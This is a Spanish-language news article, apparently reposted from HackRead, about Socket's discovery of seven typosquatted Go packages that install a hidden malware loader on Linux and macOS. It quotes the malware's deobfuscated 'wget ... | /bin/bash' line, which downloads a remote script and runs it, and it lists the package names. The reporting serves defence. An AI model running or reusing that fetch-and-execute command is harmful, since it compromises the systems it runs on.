(https://i.postimg.cc/J4p2mLjB/Malware-2.png) (https://postimg.cc/MvjDbgPW)
Socket expone una campaña de typosquatting que distribuye malware a sistemas Linux y macOS a través de paquetes Go maliciosos. Descubra las tácticas utilizadas, incluida la ofuscación y el typosquatting de dominios, y aprenda a mantenerse a salvo.
Los investigadores de ciberseguridad del proveedor de soluciones de seguridad para la cadena de suministro de software, Socket, han descubierto una nueva tendencia preocupante en la que los actores maliciosos se dirigen cada vez más a los desarrolladores dentro de la red del lenguaje de programación Go.
Al emplear una técnica conocida como typosquatting, estos atacantes distribuyen malware disfrazado de paquetes Go legítimos, que están diseñados para instalar cargadores de malware ocultos en sistemas Linux y macOS.
La investigación de Socket, compartida con Hackread.com, muestra que los atacantes han publicado al menos siete de estos paquetes engañosos en Go Module Mirror, un repositorio central para módulos Go.
La lista completa incluye:
github.com/vainreboot/layout
github.com/utilizedsun/layout
github.com/thankfulmai/hypert
github.com/shallowmulti/hypert
github.com/ornatedoctrin/layout
github.com/shadowybulk/hypert
github.com/belatedplanet/hypert
Estos paquetes se hacen pasar por bibliotecas populares, como "hypert" para probar clientes de API HTTP y "layout" para el desarrollo de la interfaz de usuario.
Detalles contextuales del paquete de diseño
(https://hackread.com/wp-content/uploads/2025/03/Malicious-Go-Packages-Found-Deploying-Malware-on-Linux-and-macOS-Systems-1.png)
El paquete "hiperactivo" parece estar dirigido específicamente a los desarrolladores del sector financiero.
Detalles contextuales del paquete Hypert malicioso
(https://hackread.com/wp-content/uploads/2025/03/Malicious-Go-Packages-Found-Deploying-Malware-on-Linux-and-macOS-Systems.avif)
Este paquete malicioso contiene funciones ocultas (como qcJjJne()) que permiten la ejecución remota de código. Al ser importado a un proyecto, el código malicioso descarga y ejecuta silenciosamente un script desde un servidor remoto (alturastreeticu), que, a su vez, instala un archivo ejecutable que puede robar datos o credenciales confidenciales.
Para evadir la detección, los atacantes emplean varias técnicas. Por ejemplo, utilizan la ofuscación de cadenas basada en matrices para ocultar los comandos maliciosos dentro del código, lo que dificulta que las herramientas de seguridad tradicionales identifiquen la amenaza. Por ejemplo, el comando
wget -O - https://alturastreeticu/storage/de373d0df/a31546bf | /bin/bash & se divide en cadenas de un solo carácter y se reconstruye utilizando una indexación no secuencial.
Además, el script malicioso incorpora un retraso de tiempo, esperando una hora antes de obtener la carga útil final, lo que les ayuda a eludir las medidas de seguridad que se centran en acciones inmediatas.
Los dominios maliciosos utilizados en esta campaña suelen parecerse a sitios web legítimos, en particular los relacionados con instituciones financieras. Esta táctica, conocida como domain typosquatting, tiene como objetivo engañar a los usuarios explotando su confianza en nombres y marcas familiares.
Los atacantes también están reutilizando cargas útiles y nombres de archivos similares en diferentes dominios y direcciones IP, lo que sugiere un esfuerzo coordinado y persistente.
El archivo ELF f0eee999, por ejemplo, muestra un comportamiento malicioso mínimo inicial, como leer /sys/kernel/mm/transparent_hugepage/, alineándose con un criptominero o cargador que permanece inactivo hasta que se cumplen las condiciones. Este archivo, junto con el script a31546bf, se ha observado en la investigación de Mads Hougesen, "Rogue One: A Malware Story", lo que indica posibles conexiones y tendencias más amplias, señalaron los investigadores.
La investigación de Socket destaca los crecientes riesgos asociados con los ataques a la cadena de suministro de software, donde los actores maliciosos apuntan a los desarrolladores y comprometen la integridad de las bibliotecas y paquetes ampliamente utilizados.
Se recomienda a los desarrolladores que estén atentos al incorporar paquetes externos a sus proyectos. Las herramientas de escaneo en tiempo real y las extensiones del navegador, junto con las auditorías de código y las prácticas cuidadosas de gestión de dependencias, son cruciales. Los desarrolladores también deben verificar la integridad de los paquetes, monitorear los nuevos repositorios y compartir indicadores de compromiso dentro de la comunidad.
Thomas Richards, consultor principal, director de práctica de redes y equipos rojos en Black Duck, un proveedor de soluciones de seguridad de aplicaciones con sede en Burlington, Massachusetts, comentó sobre el último desarrollo diciendo:
"Este ataque de typosquatting no es un nuevo vector de ataque, sin embargo, aún subraya lo importante que es administrar el riesgo del software y verificar que los módulos sean legítimos antes de integrarlos en el código fuente. La verificación de los paquetes generalmente se realiza firmándolos antes de agregarlos a un repositorio central. Cualquier aplicación que se desarrolle en Go debe revisarse de inmediato para asegurarse de que los paquetes maliciosos no estén presentes y los sistemas no se hayan visto comprometidos".
Fuente:
HackRead
https://hackread.com/malware-infects-linux-macos-typosquatted-go-packages/